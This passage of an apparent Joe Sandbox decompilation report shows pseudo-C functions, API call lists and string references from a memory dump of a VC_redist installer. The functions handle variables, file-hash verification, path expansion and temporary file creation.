                                                                          							E00030499( &_v56);
                                                                          							goto L27;
                                                                          						}
                                                                          						_t91 = _t81 - 1;
                                                                          						__eflags = _t91;
                                                                          						if(__eflags == 0) {
                                                                          							_t121 = E0004F4D2(0, __eflags, _a12, _t109, _t120,  &_v32);
                                                                          							__eflags = _t121;
                                                                          							if(_t121 < 0) {
                                                                          								L30:
                                                                          								_push("Failed to read variable value as number.");
                                                                          								goto L38;
                                                                          							}
                                                                          							_t121 = E000302B0( &_v56, _v32, _v28);
                                                                          							__eflags = _t121;
                                                                          							if(_t121 < 0) {
                                                                          								L29:
                                                                          								_push("Failed to set variable value.");
                                                                          								goto L38;
                                                                          							}
                                                                          							_t115 = 8;
                                                                          							_t96 =  &_v32;
                                                                          							do {
                                                                          								 *_t96 = 0;
                                                                          								_t96 = _t96 + 1;
                                                                          								_t115 = _t115 - 1;
                                                                          								__eflags = _t115;
                                                                          							} while (__eflags != 0);
                                                                          							goto L24;
                                                                          						}
                                                                          						_t97 = _t91 - 1;
                                                                          						__eflags = _t97;
                                                                          						if(__eflags == 0) {
                                                                          							_t121 = E0004F58F(0, __eflags, _a12, _t109, _t120,  &_v8);
                                                                          							__eflags = _t121;
                                                                          							if(_t121 < 0) {
                                                                          								_push("Failed to read variable value as string.");
                                                                          								goto L38;
                                                                          							}
                                                                          							_t121 = E000302F4( &_v56, _v8, 0);
                                                                          							__eflags = _t121;
                                                                          							if(_t121 < 0) {
                                                                          								goto L29;
                                                                          							}
                                                                          							__eflags = _v8;
                                                                          							if(__eflags != 0) {
                                                                          								E00012793(_v8);
                                                                          								_v8 = _v8 & 0x00000000;
                                                                          							}
                                                                          							goto L24;
                                                                          						}
                                                                          						__eflags = _t97 - 1;
                                                                          						if(__eflags != 0) {
                                                                          							_t121 = 0x80070057;
                                                                          							_push("Unsupported variable type.");
                                                                          							goto L38;
                                                                          						}
                                                                          						_t121 = E0004F4D2(0, __eflags, _a12, _t109, _t120,  &_v32);
                                                                          						__eflags = _t121;
                                                                          						if(_t121 < 0) {
                                                                          							goto L30;
                                                                          						}
                                                                          						_t121 = E00030455( &_v56, _v32, _v28);
                                                                          						__eflags = _t121;
                                                                          						if(_t121 < 0) {
                                                                          							goto L29;
                                                                          						}
                                                                          						_t116 = 8;
                                                                          						_t108 =  &_v32;
                                                                          						do {
                                                                          							 *_t108 = 0;
                                                                          							_t108 = _t108 + 1;
                                                                          							_t116 = _t116 - 1;
                                                                          							__eflags = _t116;
                                                                          						} while (__eflags != 0);
                                                                          						goto L24;
                                                                          					}
                                                                          					_push("Failed to read variable included flag.");
                                                                          					goto L38;
                                                                          				}
                                                                          				_push("Failed to read variable count.");
                                                                          				goto L38;
                                                                          			}


























                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00016E89
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00017095
                                                                          Strings
                                                                          • Failed to set variable., xrefs: 00017069
                                                                          • Failed to read variable name., xrefs: 0001707E
                                                                          • Failed to set variable value., xrefs: 00017048
                                                                          • Failed to read variable included flag., xrefs: 00017085
                                                                          • Failed to read variable value type., xrefs: 00017077
                                                                          • Failed to read variable count., xrefs: 00016EA9
                                                                          • Failed to read variable value as number., xrefs: 0001704F
                                                                          • Failed to read variable literal flag., xrefs: 00017070
                                                                          • Unsupported variable type., xrefs: 0001705B
                                                                          • Failed to read variable value as string., xrefs: 00017062
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
                                                                          • API String ID: 3168844106-528957463
                                                                          • Opcode ID: 6938e45f1578c35279d9016505ed263d630e338ab36a99781e7bc493276b0c88
                                                                          • Instruction ID: c2402a06339a1789ab2d4af56c2326dc7177bb440f4d5e1292a9a76de143da16
                                                                          • Opcode Fuzzy Hash: 6938e45f1578c35279d9016505ed263d630e338ab36a99781e7bc493276b0c88
                                                                          • Instruction Fuzzy Hash: 9E71A272C0561AFBDF22DEA4CC05EEFBBB8EB08710F104166FA04A6151D732DE958B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 60%
                                                                          			E000291F7(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				intOrPtr _v20;
                                                                          				char _v24;
                                                                          				signed int _v28;
                                                                          				void* _v32;
                                                                          				char _v36;
                                                                          				intOrPtr _v40;
                                                                          				intOrPtr _v44;
                                                                          				signed int _v52;
                                                                          				intOrPtr _v64;
                                                                          				void* _v68;
                                                                          				intOrPtr _v72;
                                                                          				intOrPtr _v80;
                                                                          				char _v92;
                                                                          				signed int _v100;
                                                                          				void* _v104;
                                                                          				intOrPtr _v108;
                                                                          				intOrPtr _v112;
                                                                          				intOrPtr _v116;
                                                                          				intOrPtr _v120;
                                                                          				void _v128;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t64;
                                                                          				void* _t69;
                                                                          				short* _t72;
                                                                          				signed short _t74;
                                                                          				char* _t88;
                                                                          				signed short _t90;
                                                                          				signed short _t100;
                                                                          				void* _t104;
                                                                          				void* _t106;
                                                                          				signed int* _t107;
                                                                          				signed short _t108;
                                                                          				intOrPtr _t109;
                                                                          				signed int _t111;
                                                                          				void* _t118;
                                                                          				void* _t119;
                                                                          				void* _t122;
                                                                          				signed int _t141;
                                                                          
                                                                          				_t118 = __edx;
                                                                          				_t64 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t64 ^ _t141;
                                                                          				_t109 = _a12;
                                                                          				_v44 = _a8;
                                                                          				_v40 = _t109;
                                                                          				E0003F670(_t119,  &_v92, 0, 0x30);
                                                                          				_v24 = 0xaac56b;
                                                                          				_v20 = 0x11d0cd44;
                                                                          				_v32 = 0;
                                                                          				_v36 = 0;
                                                                          				_t111 = 9;
                                                                          				_t69 = memset( &_v128, 0, _t111 << 2);
                                                                          				_v28 = _t69;
                                                                          				_t122 = _t69;
                                                                          				_v16 = 0xc000c28c;
                                                                          				_v12 = 0xee95c24f;
                                                                          				if(E000121A5( &_v32, _a8, _t69) >= 0) {
                                                                          					_t72 = _v32;
                                                                          					while(0 !=  *_t72) {
                                                                          						 *_t72 =  *_t72 + 0x20;
                                                                          						_t72 = _t72 + 2;
                                                                          					}
                                                                          					_push(0);
                                                                          					_push(0);
                                                                          					_push( &_v28);
                                                                          					_push(_t109);
                                                                          					L0004F45C();
                                                                          					_t74 = GetLastError();
                                                                          					if(_t74 != 0x7a) {
                                                                          						if(_t74 == 0) {
                                                                          							goto L11;
                                                                          						} else {
                                                                          							_t137 =  <=  ? _t74 : _t74 & 0x0000ffff | 0x80070000;
                                                                          							_t104 = 0x80004005;
                                                                          							_t128 =  >=  ? 0x80004005 :  <=  ? _t74 : _t74 & 0x0000ffff | 0x80070000;
                                                                          							_push(_t128);
                                                                          							_push(0x778);
                                                                          							goto L8;
                                                                          						}
                                                                          					} else {
                                                                          						_t106 = E000138D4(_v28, 1);
                                                                          						_push(0);
                                                                          						_t122 = _t106;
                                                                          						_t107 =  &_v28;
                                                                          						_push(_t122);
                                                                          						_push(_t107);
                                                                          						_push(_t109);
                                                                          						L0004F45C();
                                                                          						if(_t107 != 0) {
                                                                          							L11:
                                                                          							_t110 = 1 + _v28 * 2;
                                                                          							if(E00011EDE( &_v36, 1 + _v28 * 2) >= 0) {
                                                                          								if(E000126EE(0, _t122, _v28, _v36, _t110) >= 0) {
                                                                          									_v92 = 0x30;
                                                                          									_v68 =  &_v128;
                                                                          									_v100 = _v28;
                                                                          									_v108 = _v40;
                                                                          									_v116 = _v36;
                                                                          									_v112 = _v32;
                                                                          									_t110 = 2;
                                                                          									_v80 = _t110;
                                                                          									_v72 = _t110;
                                                                          									_v64 = 1;
                                                                          									_v52 = 0x80;
                                                                          									_v128 = 0x24;
                                                                          									_v104 = _t122;
                                                                          									_v120 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c)) + 8));
                                                                          									_push( &_v92);
                                                                          									_t88 =  &_v24;
                                                                          									_push(_t88);
                                                                          									_push(0xffffffff);
                                                                          									L0004F42C();
                                                                          									_t128 = _t88;
                                                                          									if(_t88 == 0) {
                                                                          										L18:
                                                                          										_v64 = _t110;
                                                                          										_push( &_v92);
                                                                          										_t90 =  &_v24;
                                                                          										_push(_t90);
                                                                          										_push(0xffffffff);
                                                                          										L0004F42C();
                                                                          										if(_t90 != 0) {
                                                                          											_t131 =  <=  ? _t90 : _t90 & 0x0000ffff | 0x80070000;
                                                                          											_t128 =  >=  ? 0x80004005 :  <=  ? _t90 : _t90 & 0x0000ffff | 0x80070000;
                                                                          											E000137D3(0x80004005, "cache.cpp", 0x7a3, _t128);
                                                                          											_push("Could not close verify handle.");
                                                                          											goto L20;
                                                                          										}
                                                                          									} else {
                                                                          										_v52 = _v52 | 0x00001000;
                                                                          										_push( &_v92);
                                                                          										_t100 =  &_v24;
                                                                          										_push(_t100);
                                                                          										_push(0xffffffff);
                                                                          										L0004F42C();
                                                                          										if(_t100 == 0) {
                                                                          											goto L18;
                                                                          										} else {
                                                                          											_t134 =  <=  ? _t100 : _t100 & 0x0000ffff | 0x80070000;
                                                                          											_t128 =  >=  ? 0x80004005 :  <=  ? _t100 : _t100 & 0x0000ffff | 0x80070000;
                                                                          											E000137D3(0x80004005, "cache.cpp", 0x79d,  >=  ? 0x80004005 :  <=  ? _t100 : _t100 & 0x0000ffff | 0x80070000);
                                                                          											E0005012F( >=  ? 0x80004005 :  <=  ? _t100 : _t100 & 0x0000ffff | 0x80070000, "Could not verify file %ls.", _v44);
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									_push("Failed to encode file hash.");
                                                                          									goto L20;
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to allocate string.");
                                                                          								goto L20;
                                                                          							}
                                                                          						} else {
                                                                          							_t108 = GetLastError();
                                                                          							_t140 =  <=  ? _t108 : _t108 & 0x0000ffff | 0x80070000;
                                                                          							_t104 = 0x80004005;
                                                                          							_t128 =  >=  ? 0x80004005 :  <=  ? _t108 : _t108 & 0x0000ffff | 0x80070000;
                                                                          							_push(_t128);
                                                                          							_push(0x773);
                                                                          							L8:
                                                                          							_push("cache.cpp");
                                                                          							E000137D3(_t104);
                                                                          							_push("Failed to get file hash.");
                                                                          							goto L20;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to allocate memory");
                                                                          					L20:
                                                                          					_push(_t128);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_v32 != 0) {
                                                                          					E000554EF(_v32);
                                                                          				}
                                                                          				if(_v36 != 0) {
                                                                          					E000554EF(_v36);
                                                                          				}
                                                                          				if(_t122 != 0) {
                                                                          					E00013999(_t122);
                                                                          				}
                                                                          				return E0003DE36(_t110, _v8 ^ _t141, _t118, _t122, _t128);
                                                                          			}


                                                                          APIs
                                                                          • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 00029297
                                                                          • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 000292BB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: $$0$@Met$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
                                                                          • API String ID: 1452528299-3882969970
                                                                          • Opcode ID: a13163b078864bf3ce65fa9291716d837a8ac6ecf649b6916af19da8d47f10b7
                                                                          • Instruction ID: 4b2d04bf594d85e6907e07a4e580d3cd1222acd1ffdffe2be3856a68be63f5be
                                                                          • Opcode Fuzzy Hash: a13163b078864bf3ce65fa9291716d837a8ac6ecf649b6916af19da8d47f10b7
                                                                          • Instruction Fuzzy Hash: 907152B1D00229ABDB21DBE8DC41FEFB7F8AF08710F110126E905FB291E77499458BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 85%
                                                                          			E00013083(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				long _v16;
                                                                          				signed int _t49;
                                                                          				long _t57;
                                                                          				void* _t63;
                                                                          				signed short _t65;
                                                                          				signed short _t66;
                                                                          				long _t69;
                                                                          				signed short _t77;
                                                                          				signed short _t78;
                                                                          				WCHAR* _t79;
                                                                          				long _t81;
                                                                          				long _t84;
                                                                          				long _t85;
                                                                          				long _t87;
                                                                          				void* _t88;
                                                                          
                                                                          				_t79 = _a8;
                                                                          				_t49 = 0;
                                                                          				_v12 = _v12 & 0;
                                                                          				_t81 = 0;
                                                                          				_v8 = 0;
                                                                          				_v16 = 0;
                                                                          				_t84 = 0x40;
                                                                          				if((_a12 & 0x00000001) == 0) {
                                                                          					L16:
                                                                          					if((_a12 & 0x00000002) == 0) {
                                                                          						_v8 = _v8 & 0x00000000;
                                                                          						_v12 = _t49;
                                                                          						goto L30;
                                                                          					} else {
                                                                          						_a12 = _a12 & 0x00000000;
                                                                          						_t83 =  !=  ? _t49 : _t79;
                                                                          						_a8 =  !=  ? _t49 : _t79;
                                                                          						_t85 =  >  ? _t81 : _t84;
                                                                          						_t88 = E00011EDE( &_v12, _t85);
                                                                          						if(_t88 >= 0) {
                                                                          							_t57 = GetFullPathNameW(_a8, _t85, _v12,  &_a12);
                                                                          							if(_t57 != 0) {
                                                                          								if(_t85 >= _t57) {
                                                                          									L26:
                                                                          									if(_t57 <= 0x104) {
                                                                          										L28:
                                                                          										_t49 = _v12;
                                                                          										L30:
                                                                          										_t80 =  !=  ? _t49 : _t79;
                                                                          										_t88 = E000121A5(_a4,  !=  ? _t49 : _t79, 0);
                                                                          									} else {
                                                                          										_t88 = E00013593( &_v12);
                                                                          										if(_t88 >= 0) {
                                                                          											goto L28;
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									_t34 = _t57 + 7; // 0x7
                                                                          									_t87 =  <  ? _t57 : _t34;
                                                                          									_t88 = E00011EDE( &_v12, _t87);
                                                                          									if(_t88 >= 0) {
                                                                          										_t57 = GetFullPathNameW(_a8, _t87, _v12,  &_a12);
                                                                          										if(_t57 != 0) {
                                                                          											if(_t87 >= _t57) {
                                                                          												goto L26;
                                                                          											} else {
                                                                          												_t63 = 0x8007007a;
                                                                          												_push(0x8007007a);
                                                                          												_t88 = 0x8007007a;
                                                                          												_push(0x149);
                                                                          												goto L4;
                                                                          											}
                                                                          										} else {
                                                                          											_t65 = GetLastError();
                                                                          											_t91 =  <=  ? _t65 : _t65 & 0x0000ffff | 0x80070000;
                                                                          											_t63 = 0x80004005;
                                                                          											_t88 =  >=  ? 0x80004005 :  <=  ? _t65 : _t65 & 0x0000ffff | 0x80070000;
                                                                          											_push(_t88);
                                                                          											_push(0x144);
                                                                          											goto L4;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							} else {
                                                                          								_t66 = GetLastError();
                                                                          								_t94 =  <=  ? _t66 : _t66 & 0x0000ffff | 0x80070000;
                                                                          								_t63 = 0x80004005;
                                                                          								_t88 =  >=  ? 0x80004005 :  <=  ? _t66 : _t66 & 0x0000ffff | 0x80070000;
                                                                          								_push(_t88);
                                                                          								_push(0x139);
                                                                          								goto L4;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_v16 = _t84;
                                                                          					_t88 = E00011EDE( &_v8, _t84);
                                                                          					if(_t88 >= 0) {
                                                                          						_t69 = ExpandEnvironmentStringsW(_t79, _v8, _v16);
                                                                          						if(_t69 != 0) {
                                                                          							_t81 = _v16;
                                                                          							if(_t81 >= _t69) {
                                                                          								L11:
                                                                          								if(_t69 <= 0x104) {
                                                                          									L15:
                                                                          									_t49 = _v8;
                                                                          									goto L16;
                                                                          								} else {
                                                                          									_t88 =  ==  ? 0 : E00013593( &_v8);
                                                                          									if(_t88 >= 0) {
                                                                          										_t88 = E0001275D(_v8,  &_v16);
                                                                          										if(_t88 >= 0) {
                                                                          											_t81 = _v16;
                                                                          											goto L15;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							} else {
                                                                          								_v16 = _t69;
                                                                          								_t88 = E00011EDE( &_v8, _t69);
                                                                          								if(_t88 >= 0) {
                                                                          									_t69 = ExpandEnvironmentStringsW(_t79, _v8, _v16);
                                                                          									if(_t69 != 0) {
                                                                          										_t81 = _v16;
                                                                          										if(_t81 >= _t69) {
                                                                          											goto L11;
                                                                          										} else {
                                                                          											_t63 = 0x8007007a;
                                                                          											_push(0x8007007a);
                                                                          											_t88 = 0x8007007a;
                                                                          											_push(0x118);
                                                                          											goto L4;
                                                                          										}
                                                                          									} else {
                                                                          										_t77 = GetLastError();
                                                                          										_t98 =  <=  ? _t77 : _t77 & 0x0000ffff | 0x80070000;
                                                                          										_t63 = 0x80004005;
                                                                          										_t88 =  >=  ? 0x80004005 :  <=  ? _t77 : _t77 & 0x0000ffff | 0x80070000;
                                                                          										_push(_t88);
                                                                          										_push(0x113);
                                                                          										goto L4;
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t78 = GetLastError();
                                                                          							_t101 =  <=  ? _t78 : _t78 & 0x0000ffff | 0x80070000;
                                                                          							_t63 = 0x80004005;
                                                                          							_t88 =  >=  ? 0x80004005 :  <=  ? _t78 : _t78 & 0x0000ffff | 0x80070000;
                                                                          							_push(_t88);
                                                                          							_push(0x108);
                                                                          							L4:
                                                                          							_push("pathutil.cpp");
                                                                          							E000137D3(_t63);
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					E000554EF(_v12);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				return _t88;
                                                                          			}





















                                                                          APIs
                                                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,00000040,00000000,00000000), ref: 000130C7
                                                                          • GetLastError.KERNEL32 ref: 000130D1
                                                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00013129
                                                                          • GetLastError.KERNEL32 ref: 00013133
                                                                          • GetFullPathNameW.KERNEL32(00000000,00000040,00000000,00000000,00000000,00000040,00000000,00000000), ref: 000131EC
                                                                          • GetLastError.KERNEL32 ref: 000131F6
                                                                          • GetFullPathNameW.KERNEL32(00000000,00000007,00000000,00000000,00000000,00000007), ref: 0001324D
                                                                          • GetLastError.KERNEL32 ref: 00013257
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
                                                                          • String ID: @Met$pathutil.cpp
                                                                          • API String ID: 1547313835-364970561
                                                                          • Opcode ID: 71874d130d99f66e38ee7f0116149dff1782e59e34d824cd6faf147065da2e1c
                                                                          • Instruction ID: 1c29808dc372ad2d3e3cabe56a18a6a919d005f9971ec3a9fabc52830b6de764
                                                                          • Opcode Fuzzy Hash: 71874d130d99f66e38ee7f0116149dff1782e59e34d824cd6faf147065da2e1c
                                                                          • Instruction Fuzzy Hash: F0619332E00729BBEF31AAA58C49BEF7AE8EF44751F114165ED05E7150E735DE808B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 66%
                                                                          			E00012DE0(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, void** _a24) {
                                                                          				signed int _v8;
                                                                          				short _v528;
                                                                          				struct _SYSTEMTIME _v544;
                                                                          				char _v548;
                                                                          				WCHAR* _v552;
                                                                          				char _v556;
                                                                          				signed int _v560;
                                                                          				intOrPtr _v564;
                                                                          				intOrPtr _v568;
                                                                          				void** _v572;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t49;
                                                                          				void* _t63;
                                                                          				void* _t82;
                                                                          				void** _t87;
                                                                          				void* _t88;
                                                                          				signed short _t89;
                                                                          				void* _t90;
                                                                          				signed short _t91;
                                                                          				intOrPtr _t95;
                                                                          				void* _t97;
                                                                          				signed int _t102;
                                                                          				void* _t106;
                                                                          				intOrPtr* _t107;
                                                                          				signed int _t115;
                                                                          				void* _t116;
                                                                          				void* _t117;
                                                                          
                                                                          				_t97 = __ecx;
                                                                          				_t49 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t49 ^ _t115;
                                                                          				_t95 = _a8;
                                                                          				_v560 = _a12;
                                                                          				_t107 = _a4;
                                                                          				_v564 = _a16;
                                                                          				_v568 = _a20;
                                                                          				_v572 = _a24;
                                                                          				E0003F670(0,  &_v528, 0, 0x208);
                                                                          				_v548 = 0;
                                                                          				_v556 = 0;
                                                                          				_t117 = _t116 + 0xc;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t106 =  &_v544 | 0xffffffff;
                                                                          				_v552 = 0;
                                                                          				if(_t107 == 0 ||  *_t107 == 0) {
                                                                          					if(GetTempPathW(0x104,  &_v528) != 0) {
                                                                          						_push( &_v548);
                                                                          						_push(_t95);
                                                                          						_push( &_v528);
                                                                          						goto L6;
                                                                          					}
                                                                          					_t91 = GetLastError();
                                                                          					_t114 =  <=  ? _t91 : _t91 & 0x0000ffff | 0x80070000;
                                                                          					_t108 =  >=  ? 0x80004005 :  <=  ? _t91 : _t91 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "pathutil.cpp", 0x283,  >=  ? 0x80004005 :  <=  ? _t91 : _t91 & 0x0000ffff | 0x80070000);
                                                                          					goto L24;
                                                                          				} else {
                                                                          					_push( &_v548);
                                                                          					_push(_t95);
                                                                          					_push(_t107);
                                                                          					L6:
                                                                          					_t63 = E00012D79(_t97);
                                                                          					_t108 = _t63;
                                                                          					if(_t63 < 0) {
                                                                          						L24:
                                                                          						if(_v552 != 0) {
                                                                          							E000554EF(_v552);
                                                                          						}
                                                                          						if(_v556 != 0) {
                                                                          							E000554EF(_v556);
                                                                          						}
                                                                          						if(_v548 != 0) {
                                                                          							E000554EF(_v548);
                                                                          						}
                                                                          						return E0003DE36(_t95, _v8 ^ _t115, _t103, _t106, _t108);
                                                                          					}
                                                                          					if(E00013446(_t97, _v548,  &_v556) != 0) {
                                                                          						L9:
                                                                          						_t95 =  !=  ? _v560 : 0x5b524;
                                                                          						while(1) {
                                                                          							_v560 = _v560 & 0x00000000;
                                                                          							GetLocalTime( &_v544);
                                                                          							_t103 = ".";
                                                                          							_push(_v564);
                                                                          							_push(0x2e);
                                                                          							_t74 =  !=  ? "." : 0x5b524;
                                                                          							_push( !=  ? "." : 0x5b524);
                                                                          							_push(_t95);
                                                                          							_push(_v544.wSecond & 0x0000ffff);
                                                                          							_push(_v544.wMinute & 0x0000ffff);
                                                                          							_push(_v544.wHour & 0x0000ffff);
                                                                          							_push(_v544.wDay & 0x0000ffff);
                                                                          							_push(_v544.wMonth & 0x0000ffff);
                                                                          							_push(_v544.wYear & 0x0000ffff);
                                                                          							_t82 = E00011F20( &_v552, L"%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls", _v548);
                                                                          							_t108 = _t82;
                                                                          							_t117 = _t117 + 0x30;
                                                                          							if(_t82 < 0) {
                                                                          								break;
                                                                          							}
                                                                          							_t106 = CreateFileW(_v552, 0x40000000, 1, 0, 1, 0x80, 0);
                                                                          							if(_t106 != 0xffffffff) {
                                                                          								L18:
                                                                          								_t86 = _v568;
                                                                          								if(_v568 == 0) {
                                                                          									L20:
                                                                          									_t87 = _v572;
                                                                          									if(_t87 != 0) {
                                                                          										 *_t87 = _t106;
                                                                          										_t106 = _t106 | 0xffffffff;
                                                                          									}
                                                                          									break;
                                                                          								}
                                                                          								_t88 = E000121A5(_t86, _v552, 0);
                                                                          								_t108 = _t88;
                                                                          								if(_t88 < 0) {
                                                                          									break;
                                                                          								}
                                                                          								goto L20;
                                                                          							}
                                                                          							_t89 = GetLastError();
                                                                          							if(_t89 == 0x50 || _t89 == 5) {
                                                                          								Sleep(0x64);
                                                                          								_t89 = 0;
                                                                          								_t102 = 1;
                                                                          							} else {
                                                                          								_t102 = _v560;
                                                                          							}
                                                                          							_t108 =  <=  ? _t89 : _t89 & 0x0000ffff | 0x80070000;
                                                                          							if(( <=  ? _t89 : _t89 & 0x0000ffff | 0x80070000) < 0) {
                                                                          								goto L24;
                                                                          							} else {
                                                                          								if(_t102 != 0) {
                                                                          									continue;
                                                                          								}
                                                                          								goto L18;
                                                                          							}
                                                                          						}
                                                                          						if(_t106 != 0xffffffff) {
                                                                          							CloseHandle(_t106);
                                                                          						}
                                                                          						goto L24;
                                                                          					}
                                                                          					_t90 = E00014013(_v556, _t70);
                                                                          					_t108 = _t90;
                                                                          					if(_t90 < 0) {
                                                                          						goto L24;
                                                                          					}
                                                                          					goto L9;
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • GetTempPathW.KERNEL32(00000104,?,00000001,00000000,00000000), ref: 00012E7A
                                                                          • GetLastError.KERNEL32 ref: 00012E84
                                                                          • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00012F1F
                                                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00012FAD
                                                                          • GetLastError.KERNEL32 ref: 00012FBA
                                                                          • Sleep.KERNEL32(00000064), ref: 00012FCC
                                                                          • CloseHandle.KERNEL32(?), ref: 0001302C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                          • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$@Met$pathutil.cpp
                                                                          • API String ID: 3480017824-2730180625
                                                                          • Opcode ID: 9512d95184e2aa1043d1bc215d8cab75acc9eb7844e2041d882e0af6c58453da
                                                                          • Instruction ID: 42c6d76207b69c3f3116b249a406127214d29d3c174858e329ff219f15e82382
                                                                          • Opcode Fuzzy Hash: 9512d95184e2aa1043d1bc215d8cab75acc9eb7844e2041d882e0af6c58453da
                                                                          • Instruction Fuzzy Hash: 08715072941229ABDB719BA4DC49BEBB3F9AB08711F0001A5FD09E7191D7349EC4CF60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 68%
                                                                          			E00056DA8(intOrPtr* _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				void* __ebx;
                                                                          				signed int _t68;
                                                                          				int _t69;
                                                                          				int _t70;
                                                                          				void* _t84;
                                                                          				intOrPtr _t92;
